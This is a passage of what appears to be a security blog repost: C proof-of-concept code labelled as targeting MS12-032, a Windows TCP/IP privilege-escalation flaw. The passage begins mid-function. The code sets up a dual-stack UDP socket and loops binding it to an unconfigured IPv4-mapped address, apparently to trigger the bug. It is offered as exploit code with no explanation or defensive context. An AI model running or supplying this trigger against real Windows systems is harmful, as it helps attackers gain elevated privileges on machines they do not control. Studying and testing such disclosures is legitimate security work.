    {
        WORD wVersionRequested;
        WSADATA wsaData;
        int err;

        wVersionRequested = MAKEWORD(2, 2);
        err = WSAStartup(wVersionRequested, &wsaData);
        if (err != 0) {
            printf("WSAStartup failed with error: %d\n", err);
            exit(-1);
        }
    }

    int main(void)
    {
        MyWsaStartup();

        bool bindSuccess = false;
        while (!bindSuccess) {
            SOCKET sock = WSASocket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED);
            if (sock == INVALID_SOCKET) {
                printf("WSASocket failed\n");
                exit(-1);
            }

            // dual-stack socket: allow IPv4-mapped addresses on an AF_INET6 socket
            DWORD val = 0;
            if (setsockopt(sock, IPPROTO_IPV6, IPV6_V6ONLY, (const char*)&val, sizeof(val)) != 0) {
                printf("setsockopt failed\n");
                closesocket(sock);
                exit(-1);
            }

            sockaddr_in6 sockAddr;
            memset(&sockAddr, 0, sizeof(sockAddr));
            sockAddr.sin6_family = AF_INET6;
            sockAddr.sin6_port = htons(5060);

            // set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)
            // that is [::FFFF:169.13.13.13]
            sockAddr.sin6_addr.u.Byte[15] = 13;
            sockAddr.sin6_addr.u.Byte[14] = 13;
            sockAddr.sin6_addr.u.Byte[13] = 13;
            sockAddr.sin6_addr.u.Byte[12] = 169;
            sockAddr.sin6_addr.u.Byte[11] = 0xFF;
            sockAddr.sin6_addr.u.Byte[10] = 0xFF;

            int size = 28; // 28 is sizeof(sockaddr_in6)
            int nRet = bind(sock, (sockaddr*)&sockAddr, size);
            if (nRet == SOCKET_ERROR) {
                closesocket(sock);
                Sleep(100);
            } else {
                bindSuccess = true;
                printf("bind succeeded\n");
                closesocket(sock);
            }
        }
        return 0;
    }

by d3v1l at 22:37

Source: Security-Shell: MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege